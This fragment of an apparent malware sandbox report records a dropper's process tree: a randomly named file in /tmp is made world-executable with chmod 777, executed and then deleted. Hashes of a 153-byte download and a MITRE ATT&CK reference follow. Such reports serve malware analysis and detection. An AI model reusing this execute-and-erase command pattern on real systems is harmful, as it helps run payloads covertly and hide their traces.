/bin/chmodchmod 777 tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j2⤵
- File and Directory Permissions Modification
PID:993
-
-
/tmp/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j./tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j2⤵
- Executes dropped EXE
PID:994
-
-
/bin/rmrm tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j2⤵PID:995
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97